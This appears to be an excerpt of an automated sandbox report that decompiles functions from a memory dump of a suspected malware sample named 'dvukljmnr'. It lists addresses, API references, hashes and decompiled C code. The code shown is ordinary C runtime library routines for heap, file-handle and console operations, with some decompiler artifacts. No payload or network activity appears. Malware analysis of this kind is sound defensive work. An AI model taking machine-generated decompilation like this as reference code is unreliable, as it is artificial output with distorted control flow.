                                                          0x009afb0b
                                                          0x009afb0b
                                                          0x009afb0f
                                                          0x009afb12
                                                          0x009afb14
                                                          0x009afb17
                                                          0x009afb1a
                                                          0x009afb1d
                                                          0x009afb1f
                                                          0x009afc33
                                                          0x009afc33
                                                          0x009afc38
                                                          0x009afc3a
                                                          0x009afc3e
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc44
                                                          0x009afc46
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc4c
                                                          0x009afc4d
                                                          0x009afc4f
                                                          0x009afc51
                                                          0x009afc59
                                                          0x009afc5e
                                                          0x009afc5f
                                                          0x009afc66
                                                          0x009afc85
                                                          0x009afc88
                                                          0x009afc8f
                                                          0x009afc91
                                                          0x009afca4
                                                          0x009afca6
                                                          0x009afcaf
                                                          0x009afcb6
                                                          0x009afcbb
                                                          0x009afcfa
                                                          0x009afd00
                                                          0x009afcbd
                                                          0x009afcbf
                                                          0x009afcc0
                                                          0x009afcc4
                                                          0x009afcc7
                                                          0x009afcca
                                                          0x009afcd3
                                                          0x009afcd5
                                                          0x009afcd5
                                                          0x009afcd6
                                                          0x009afcda
                                                          0x009afcda
                                                          0x009afcdd
                                                          0x009afce0
                                                          0x009afce9
                                                          0x009afceb
                                                          0x009afceb
                                                          0x009afcec
                                                          0x009afcec
                                                          0x009afcf0
                                                          0x009afcf0
                                                          0x009afca8
                                                          0x009afca8
                                                          0x009afca8
                                                          0x009afd08
                                                          0x009afd0b
                                                          0x009afd0e
                                                          0x009afd25
                                                          0x009afd27
                                                          0x009afd29
                                                          0x00000000
                                                          0x00000000
                                                          0x009afd34
                                                          0x009afd36
                                                          0x009afd39
                                                          0x009afd39
                                                          0x009afd42
                                                          0x00000000
                                                          0x009afd42
                                                          0x009afc98
                                                          0x009afa89
                                                          0x009afa89
                                                          0x009afa8c
                                                          0x009afa8c
                                                          0x00000000
                                                          0x009afa8c
                                                          0x009afc68
                                                          0x009afc6b
                                                          0x009afc6b
                                                          0x009afc6e
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc70
                                                          0x009afc72
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc74
                                                          0x009afc75
                                                          0x009afc76
                                                          0x009afc79
                                                          0x009afc80
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc80
                                                          0x009afc82
                                                          0x00000000
                                                          0x009afc82
                                                          0x009afc53
                                                          0x00000000
                                                          0x009afc53
                                                          0x009afb27
                                                          0x009afb28
                                                          0x009afb2a
                                                          0x009afb2a
                                                          0x009afb2c
                                                          0x009afb2e
                                                          0x00000000
                                                          0x00000000
                                                          0x009afb34
                                                          0x009afb36
                                                          0x009afb45
                                                          0x009afb47
                                                          0x009afb65
                                                          0x009afb6a
                                                          0x009afb6a
                                                          0x009afb6b
                                                          0x009afb6c
                                                          0x009afb6d
                                                          0x009afb77
                                                          0x009afb78
                                                          0x009afb7c
                                                          0x009afb82
                                                          0x009afb84
                                                          0x009afb90
                                                          0x009afb90
                                                          0x009afb94
                                                          0x00000000
                                                          0x00000000
                                                          0x009afb96
                                                          0x009afb99
                                                          0x009afba0
                                                          0x009afba5
                                                          0x009afbca
                                                          0x009afbcd
                                                          0x009afbe8
                                                          0x009afbf1
                                                          0x009afbf6
                                                          0x009afbf9
                                                          0x009afbfe
                                                          0x009afbff
                                                          0x009afc02
                                                          0x009afbda
                                                          0x009afbda
                                                          0x009afbdc
                                                          0x009afbdc
                                                          0x00000000
                                                          0x009afbdc
                                                          0x009afc06
                                                          0x009afc07
                                                          0x009afc09
                                                          0x009afc09
                                                          0x00000000
                                                          0x009afc09
                                                          0x009afbd1
                                                          0x009afbd2
                                                          0x009afbd5
                                                          0x00000000
                                                          0x00000000
                                                          0x009afbd7
                                                          0x009afbd9
                                                          0x009afbd9
                                                          0x00000000
                                                          0x009afbd9
                                                          0x009afba9
                                                          0x009afbaa
                                                          0x009afbac
                                                          0x009afbaf
                                                          0x009afbb6
                                                          0x009afbb9
                                                          0x009afbc4
                                                          0x009afbb1
                                                          0x009afbb1
                                                          0x009afbb3
                                                          0x009afbb3
                                                          0x00000000
                                                          0x009afb86
                                                          0x009afb86
                                                          0x009afb8c
                                                          0x009afb8e
                                                          0x009afc0c
                                                          0x009afc0c
                                                          0x009afc11
                                                          0x009afc12
                                                          0x009afc14
                                                          0x009afbdd
                                                          0x009afbdd
                                                          0x009afbe0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009afbe6
                                                          0x00000000
                                                          0x009afb8e
                                                          0x009afb84
                                                          0x009afb49
                                                          0x009afb49
                                                          0x009afb4c
                                                          0x009afb4f
                                                          0x009afb5e
                                                          0x009afb60
                                                          0x009afb62
                                                          0x00000000
                                                          0x009afb62
                                                          0x009afb53
                                                          0x009afb54
                                                          0x009afb57
                                                          0x00000000
                                                          0x009afb57
                                                          0x009afb38
                                                          0x009afb3a
                                                          0x009afb3b
                                                          0x00000000
                                                          0x009afb3b
                                                          0x009afc17
                                                          0x009afc1e
                                                          0x009afc22
                                                          0x009afc24
                                                          0x009afc30
                                                          0x009afc32
                                                          0x009afc32
                                                          0x009afc26
                                                          0x009afc28
                                                          0x009afc28
                                                          0x00000000
                                                          0x009afc24
                                                          0x009afb00
                                                          0x009afb03
                                                          0x00000000
                                                          0x00000000
                                                          0x009afb05
                                                          0x00000000
                                                          0x009afb05
                                                          0x009afa7c
                                                          0x009afa7c
                                                          0x009afa82
                                                          0x009afa83
                                                          0x00000000
                                                          0x009afa88
                                                          0x009afa51
                                                          0x009afa2f
                                                          0x009af913
                                                          0x009af8f0
                                                          0x009af8f5
                                                          0x009af8d0
                                                          0x009affcc
                                                          0x009affd1
                                                          0x009affd1
                                                          0x009affd1
                                                          0x00000000
                                                          0x009af915
                                                          0x009af915
                                                          0x00000000
                                                          0x009af915
                                                          0x009af913

                                                          APIs
                                                          • __malloc_crt.LIBCMT ref: 009AF933
                                                          • GetConsoleMode.KERNEL32 ref: 009AFA46
                                                          • ReadConsoleW.KERNEL32(?,?,009B2B47,?,00000000), ref: 009AFA72
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000001,00000000,?,?,?,?,?,?,009B2B47,?), ref: 009AFA7C
                                                          • __dosmaperr.LIBCMT ref: 009AFA83
                                                          • _free.LIBCMT ref: 009AFD52
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: Console$ErrorLastModeRead__dosmaperr__malloc_crt_free
                                                          • String ID:
                                                          • API String ID: 3470617983-0
                                                          • Opcode ID: dde42d1e8063dcc5eb365c9e08b65814938f7a47c5e62747a1ea620129d83373
                                                          • Instruction ID: 992db9ccb05113db84f02c962f3552eadaae0e2fcbb6f8b591836f2c90ec76f2
                                                          • Opcode Fuzzy Hash: dde42d1e8063dcc5eb365c9e08b65814938f7a47c5e62747a1ea620129d83373
                                                          • Instruction Fuzzy Hash: 2141EA70E146858ECB26CFDC9C64BE9BBA9AB47314F054175EC588B2A2D730CD0AC7D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A6AE8 Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E009A6AE8(void* __ebx, signed int __edx) {
				intOrPtr _t43;
				void* _t55;
				signed int _t69;
				signed int _t70;
				signed int _t75;
				intOrPtr _t77;
				signed int _t82;
				void* _t83;

				_t75 = __edx;
				_t61 = __ebx;
				_t86 = __ebx;
				if(__ebx == 0) {
					L24:
					return E009AF225(_t77);
				} else {
					memcpy(__ebx,  *( *((intOrPtr*)(_t83 - 0x20)) + 0x68), 0x88 << 2);
					_t82 = 0;
					 *__ebx = 0;
					_t77 = E009B48E9(_t75,  *( *((intOrPtr*)(_t83 - 0x20)) + 0x68) + 0x110, _t86,  *((intOrPtr*)(_t83 + 8)), __ebx);
					 *((intOrPtr*)(_t83 + 8)) = _t77;
					if(_t77 != 0) {
						__eflags = _t77 - 0xffffffff;
						if(_t77 == 0xffffffff) {
							__eflags = __ebx - 0x9ceac8;
							if(__ebx != 0x9ceac8) {
								E009B2248(__ebx);
							}
							 *((intOrPtr*)(E009AF100())) = 0x16;
						}
						goto L24;
					}
					_t43 =  *((intOrPtr*)(_t83 - 0x20));
					asm("lock xadd [ecx], edx");
					if((_t75 | 0xffffffff) == 0) {
						_t73 =  *(_t43 + 0x68);
						if( *(_t43 + 0x68) != 0x9ceac8) {
							E009B2248(_t73);
							_t43 =  *((intOrPtr*)(_t83 - 0x20));
						}
					}
					 *(_t43 + 0x68) = _t61;
					asm("lock xadd [ebx], eax");
					if(( *( *((intOrPtr*)(_t83 - 0x20)) + 0x70) & 0x00000002) == 0 && ( *0x9cee10 & 0x00000001) == 0) {
						E009B20A9(0xd);
						 *(_t83 - 4) = _t82;
						 *0x9cfcd4 =  *((intOrPtr*)(_t61 + 4));
						 *0x9cfcd8 =  *((intOrPtr*)(_t61 + 8));
						 *0x9cfce8 =  *((intOrPtr*)(_t61 + 0x21c));
						_t69 = _t82;
						while(1) {
							 *(_t83 - 0x1c) = _t69;
							if(_t69 >= 5) {
								break;
							}
							 *((short*)(0x9cfcdc + _t69 * 2)) =  *((intOrPtr*)(_t61 + 0xc + _t69 * 2));
							_t69 = _t69 + 1;
						}
						_t70 = _t82;
						while(1) {
							 *(_t83 - 0x1c) = _t70;
							__eflags = _t70 - 0x101;
							if(_t70 >= 0x101) {
								goto L14;
							}
							 *((char*)(_t70 + 0x9ce8c0)) =  *((intOrPtr*)(_t70 + _t61 + 0x18));
							_t70 = _t70 + 1;
						}
						while(1) {
							L14:
							 *(_t83 - 0x1c) = _t82;
							__eflags = _t82 - 0x100;
							if(_t82 >= 0x100) {
								break;
							}
							 *((char*)(_t82 + 0x9ce9c8)) =  *((intOrPtr*)(_t82 + _t61 + 0x119));
							_t82 = _t82 + 1;
						}
						__eflags = _t70 | 0xffffffff;
						asm("lock xadd [eax], ecx");
						if((_t70 | 0xffffffff) == 0) {
							_t55 =  *0x9cecec; // 0x471778
							__eflags = _t55 - 0x9ceac8;
							if(_t55 != 0x9ceac8) {
								E009B2248(_t55);
							}
						}
						 *0x9cecec = _t61;
						asm("lock xadd [ebx], eax");
						 *(_t83 - 4) = 0xfffffffe;
						E009B48B3();
					}
					goto L24;
				}
			}











                                                          0x009a6ae8
                                                          0x009a6ae8
                                                          0x009b4784
                                                          0x009b4786
                                                          0x009b48e1
                                                          0x009b48e8
                                                          0x009b478c
                                                          0x009b4799
                                                          0x009b479b
                                                          0x009b479d
                                                          0x009b47aa
                                                          0x009b47ac
                                                          0x009b47b1
                                                          0x009b48be
                                                          0x009b48c1
                                                          0x009b48c3
                                                          0x009b48c9
                                                          0x009b48cc
                                                          0x009b48d1
                                                          0x009b48d7
                                                          0x009b48d7
                                                          0x00000000
                                                          0x009b48c1
                                                          0x009b47b7
                                                          0x009b47c0
                                                          0x009b47c4
                                                          0x009b47c6
                                                          0x009b47cf
                                                          0x009b47d2
                                                          0x009b47d8
                                                          0x009b47d8
                                                          0x009b47cf
                                                          0x009b47db
                                                          0x009b47e1
                                                          0x009b47ec
                                                          0x009b4801
                                                          0x009b4807
                                                          0x009b480d
                                                          0x009b4815
                                                          0x009b4820
                                                          0x009b4825
                                                          0x009b4827
                                                          0x009b4827
                                                          0x009b482d
                                                          0x00000000
                                                          0x00000000
                                                          0x009b4834
                                                          0x009b483c
                                                          0x009b483c
                                                          0x009b483f
                                                          0x009b4841
                                                          0x009b4841
                                                          0x009b4844
                                                          0x009b484a
                                                          0x00000000
                                                          0x00000000
                                                          0x009b4850
                                                          0x009b4856
                                                          0x009b4856
                                                          0x009b4859
                                                          0x009b4859
                                                          0x009b4859
                                                          0x009b485c
                                                          0x009b4862
                                                          0x00000000
                                                          0x00000000
                                                          0x009b486b
                                                          0x009b4871
                                                          0x009b4871
                                                          0x009b4879
                                                          0x009b487c
                                                          0x009b4880
                                                          0x009b4882
                                                          0x009b4887
                                                          0x009b488c
                                                          0x009b488f
                                                          0x009b4894
                                                          0x009b488c
                                                          0x009b4895
                                                          0x009b489e
                                                          0x009b48a2
                                                          0x009b48a9
                                                          0x009b48a9
                                                          0x00000000
                                                          0x009b47ec

                                                          APIs
                                                          • __setmbcp_nolock.LIBCMT ref: 009B47A3
                                                            • Part of subcall function 009B48E9: getSystemCP.LIBCMT ref: 009B4901
                                                            • Part of subcall function 009B48E9: setSBCS.LIBCMT ref: 009B490E
                                                          • _free.LIBCMT ref: 009B47D2
                                                            • Part of subcall function 009B2248: HeapFree.KERNEL32(00000000,00000000), ref: 009B225C
                                                            • Part of subcall function 009B2248: GetLastError.KERNEL32(00000000,?,009B060D,00000000,?,009CE000), ref: 009B226E
                                                          • __lock.LIBCMT ref: 009B4801
                                                          • _free.LIBCMT ref: 009B488F
                                                          • _free.LIBCMT ref: 009B48CC
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLastSystem__lock__setmbcp_nolock
                                                          • String ID:
                                                          • API String ID: 2025676541-0
                                                          • Opcode ID: 892a9b0d980b05250adc93d2c362be02ae8a97b95cea822657832b982ed6507f
                                                          • Instruction ID: 15082d5e1f2e5f5613b2308eabd6146c6695541089bec513520f9c58288ead37
                                                          • Opcode Fuzzy Hash: 892a9b0d980b05250adc93d2c362be02ae8a97b95cea822657832b982ed6507f
                                                          • Instruction Fuzzy Hash: 2F41F574D542848FDB15DF68D9C0BE877E8FB45330B24416DE8669B693CB388C42EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B6902 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E009B6902(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x9cf22c, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x9d0060 == _t7) {
									_t9 = E009AF100();
									 *_t9 = E009AF159(GetLastError());
									goto L17;
								} else {
									if(E009B4C7E(_t7, _t31) == 0) {
										_t12 = E009AF100();
										 *_t12 = E009AF159(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E009B4C7E(_t6, _t31);
						 *((intOrPtr*)(E009AF100())) = 0xc;
						goto L12;
					} else {
						E009B2248(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E009B6870(__ebx, __edx, __edi, _a8);
				}
			}









                                                          0x009b6909
                                                          0x009b6917
                                                          0x009b691c
                                                          0x009b692b
                                                          0x009b695e
                                                          0x009b6930
                                                          0x009b6932
                                                          0x009b6932
                                                          0x009b693f
                                                          0x009b6945
                                                          0x009b6949
                                                          0x009b69a9
                                                          0x009b69a9
                                                          0x009b694b
                                                          0x009b6951
                                                          0x009b6993
                                                          0x009b69a7
                                                          0x00000000
                                                          0x009b6953
                                                          0x009b695c
                                                          0x009b697b
                                                          0x009b698f
                                                          0x009b6975
                                                          0x009b6975
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009b695c
                                                          0x009b6951
                                                          0x00000000
                                                          0x009b6977
                                                          0x009b6964
                                                          0x009b696f
                                                          0x00000000
                                                          0x009b691e
                                                          0x009b6921
                                                          0x009b6927
                                                          0x009b6927
                                                          0x009b6978
                                                          0x009b697a
                                                          0x009b690b
                                                          0x009b6915
                                                          0x009b6915

                                                          APIs
                                                          • _malloc.LIBCMT ref: 009B690E
                                                            • Part of subcall function 009B6870: __FF_MSGBANNER.LIBCMT ref: 009B6887
                                                            • Part of subcall function 009B6870: __NMSG_WRITE.LIBCMT ref: 009B688E
                                                            • Part of subcall function 009B6870: RtlAllocateHeap.NTDLL(00440000,00000000,00000001,00000000,00000000,00000000,?,009B22DE,00000000,00000000,00000000,00000000,?,009B2193,00000018,009CC228), ref: 009B68B3
                                                          • _free.LIBCMT ref: 009B6921
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free_malloc
                                                          • String ID:
                                                          • API String ID: 1020059152-0
                                                          • Opcode ID: 1c5b241c96fe85e4035ba39a9651c938ae6608e1e921a3bc85767cb8b7f9a249
                                                          • Instruction ID: 580ec1b5ae87a2f4d2080605421722227a8d25995727818da3d88966004fae7a
                                                          • Opcode Fuzzy Hash: 1c5b241c96fe85e4035ba39a9651c938ae6608e1e921a3bc85767cb8b7f9a249
                                                          • Instruction Fuzzy Hash: B811C63281D215EFCB212FB0EE147EA3B98AF453B0F204539F949DA161DB38A84096D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A6016 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E009A6016(signed char __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t30;
				signed int _t37;
				signed int _t40;
				signed int _t48;
				void* _t50;
				signed int _t52;
				void* _t53;
				void* _t56;
				signed int _t57;
				void* _t58;

				_t56 = __esi;
				_t53 = __edi;
				_t50 = __edx;
				_t42 = __ebx;
				if(__eflags != 0) {
					_t42 = __ebx + 0x20;
				}
				if(( *(_t58 + 0xc) & 0x00004000) != 0) {
					_t42 = _t42 | 0x00000080;
				}
				if(( *(_t58 + 0xc) & 0x00000080) != 0) {
					_t42 = _t42 | 0x00000010;
				}
				_t30 = GetFileType( *(_t58 + 8));
				if(_t30 != 0) {
					__eflags = _t30 - 2;
					if(__eflags != 0) {
						__eflags = _t30 - 3;
						if(__eflags == 0) {
							_t42 = _t42 | 0x00000008;
							__eflags = _t42;
						}
					} else {
						_t42 = _t42 | 0x00000040;
					}
					_t57 = E009B3A06(_t42, _t50, _t53, _t56, __eflags);
					 *(_t58 + 0xc) = _t57;
					__eflags = _t57 - 0xffffffff;
					if(_t57 != 0xffffffff) {
						 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
						E009B3DB2(_t57,  *(_t58 + 8));
						_t52 = _t57 >> 5;
						_t48 = (_t57 & 0x0000001f) << 6;
						 *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 4) = _t42 | 0x00000001;
						 *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) =  *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) & 0x00000080;
						 *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) =  *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) & 0x0000007f;
						 *((intOrPtr*)(_t58 - 0x1c)) = 1;
						 *(_t58 - 4) = 0xfffffffe;
						E009B3D8D(1, _t57);
						__eflags = 1;
						if(1 == 0) {
							_t57 = _t57 | 0xffffffff;
							__eflags = _t57;
						}
						_t37 = _t57;
					} else {
						 *((intOrPtr*)(E009AF100())) = 0x18;
						_t40 = E009AF0CC();
						 *_t40 =  *_t40 & 0x00000000;
						goto L9;
					}
				} else {
					_t40 = E009AF0DF(GetLastError());
					L9:
					_t37 = _t40 | 0xffffffff;
				}
				return E009AF225(_t37);
			}













                                                          0x009a6016
                                                          0x009a6016
                                                          0x009a6016
                                                          0x009a6016
                                                          0x009b3cb2
                                                          0x009b3cb4
                                                          0x009b3cb4
                                                          0x009b3cbe
                                                          0x009b3cc0
                                                          0x009b3cc0
                                                          0x009b3cc7
                                                          0x009b3cc9
                                                          0x009b3cc9
                                                          0x009b3ccf
                                                          0x009b3cd7
                                                          0x009b3cee
                                                          0x009b3cf1
                                                          0x009b3cf8
                                                          0x009b3cfb
                                                          0x009b3cfd
                                                          0x009b3cfd
                                                          0x009b3cfd
                                                          0x009b3cf3
                                                          0x009b3cf3
                                                          0x009b3cf3
                                                          0x009b3d05
                                                          0x009b3d07
                                                          0x009b3d0a
                                                          0x009b3d0d
                                                          0x009b3d24
                                                          0x009b3d2c
                                                          0x009b3d38
                                                          0x009b3d40
                                                          0x009b3d4a
                                                          0x009b3d55
                                                          0x009b3d61
                                                          0x009b3d69
                                                          0x009b3d6c
                                                          0x009b3d73
                                                          0x009b3d78
                                                          0x009b3d7a
                                                          0x009b3d7c
                                                          0x009b3d7c
                                                          0x009b3d7c
                                                          0x009b3d7f
                                                          0x009b3d0f
                                                          0x009b3d14
                                                          0x009b3d1a
                                                          0x009b3d1f
                                                          0x00000000
                                                          0x009b3d1f
                                                          0x009b3cd9
                                                          0x009b3ce0
                                                          0x009b3ce6
                                                          0x009b3ce6
                                                          0x009b3ce6
                                                          0x009b3d86

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                          • String ID:
                                                          • API String ID: 43408053-0
                                                          • Opcode ID: 2e04a13d24654045013decf1bdae54fbc133757c4ac394d5a4645ba2a096ef4b
                                                          • Instruction ID: 9e8aab5806c284d91b9b5f50a4a9beef4495bb816137996ca4eef90094ce3e9b
                                                          • Opcode Fuzzy Hash: 2e04a13d24654045013decf1bdae54fbc133757c4ac394d5a4645ba2a096ef4b
                                                          • Instruction Fuzzy Hash: E4212B319195106ACB21DBB8DE157E87F545F81334F28C718E8B15B2E3C7389B06AB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A2695 Relevance: 7.6, APIs: 5, Instructions: 59fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 80%
                                                          			E009A2695(void* __eax, signed char __ecx, signed int __edx, signed int* __edi) {
				intOrPtr _t33;
				intOrPtr _t36;
				intOrPtr _t48;
				signed char _t50;
				signed char _t63;
				signed int _t65;
				signed int _t67;
				signed int* _t68;
				void* _t73;
				void* _t80;

				_t68 = __edi;
				_t50 = __ecx;
				_t63 = __edx ^ __edx;
				asm("pushfd");
				_t1 = _t63 + 0x24243244;
				 *_t1 =  *((intOrPtr*)(_t63 + 0x24243244)) + __ecx;
				if( *_t1 <= 0) {
					asm("enter 0x4c88, 0x32");
					_t80 = _t73 - 1;
					asm("adc al, 0x38");
					_pop(_t73);
				}
				asm("std");
				if(_t80 == 0 && (_t50 & 0x00000008) != 0) {
					 *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) =  *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) | 0x00000020;
					_t50 =  *(_t73 + 0x14);
				}
				_t70 =  *(_t73 - 8);
				if(( *(_t73 - 8) & 0xc0000000) == 0xc0000000) {
					_t84 = _t50 & 0x00000001;
					if((_t50 & 0x00000001) != 0) {
						CloseHandle( *(_t73 - 0x1c));
						_t36 = E009B23DE(_t50, _t84,  *((intOrPtr*)(_t73 + 0x10)), _t70 & 0x7fffffff,  *((intOrPtr*)(_t73 - 0xc)), _t73 - 0x38, 3,  *((intOrPtr*)(_t73 - 0x18)),  *((intOrPtr*)(_t73 - 0x10)));
						if(_t36 != 0xffffffff) {
							_t65 =  *_t68;
							_t67 = (_t65 & 0x0000001f) << 6;
							__eflags = _t67;
							 *((intOrPtr*)(_t67 +  *((intOrPtr*)(0x9cf230 + (_t65 >> 5) * 4)))) = _t36;
						} else {
							E009AF0DF(GetLastError());
							 *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) =  *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) & 0x000000fe;
							E009B3BAF( *_t68);
							_t48 =  *((intOrPtr*)(E009AF100()));
						}
					}
				}
				_t33 = _t48;
				return _t33;
			}













                                                          0x009a2695
                                                          0x009a2695
                                                          0x009b2c8d
                                                          0x009b2c8f
                                                          0x009b2c90
                                                          0x009b2c90
                                                          0x009b2c96
                                                          0x009b2c98
                                                          0x009b2c9e
                                                          0x009b2c9f
                                                          0x009b2ca1
                                                          0x009b2ca1
                                                          0x009b2ca2
                                                          0x009b2ca3
                                                          0x009b2cbe
                                                          0x009b2cc3
                                                          0x009b2cc3
                                                          0x009b2cc6
                                                          0x009b2cd4
                                                          0x009b2cd6
                                                          0x009b2cd9
                                                          0x009b2cde
                                                          0x009b2cfd
                                                          0x009b2d08
                                                          0x009b2d3c
                                                          0x009b2d46
                                                          0x009b2d46
                                                          0x009b2d50
                                                          0x009b2d0a
                                                          0x009b2d11
                                                          0x009b2d2a
                                                          0x009b2d31
                                                          0x009b28db
                                                          0x009b28db
                                                          0x009b2d08
                                                          0x009b2cd9
                                                          0x009b2d53
                                                          0x009b2841

                                                          APIs
                                                          • CloseHandle.KERNEL32(?), ref: 009B2CDE
                                                          • ___createFile.LIBCMT ref: 009B2CFD
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009B2D0A
                                                          • __dosmaperr.LIBCMT ref: 009B2D11
                                                          • __free_osfhnd.LIBCMT ref: 009B2D31
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorFileHandleLast___create__dosmaperr__free_osfhnd
                                                          • String ID:
                                                          • API String ID: 1832824508-0
                                                          • Opcode ID: ebfef6d7fe2523746f2376dd0dd6234c98734da68e2d6faa07b1d551e8c7d4d6
                                                          • Instruction ID: 51bb2f7f9d771b055be6b00e6ef8734223032a922ed6864034bb30c536be8733
                                                          • Opcode Fuzzy Hash: ebfef6d7fe2523746f2376dd0dd6234c98734da68e2d6faa07b1d551e8c7d4d6
                                                          • Instruction Fuzzy Hash: 0811763192010A5FCB0A8F64EF54AEDBF26FB44370F288218F961572E2CB228D11D780
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009BE04E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
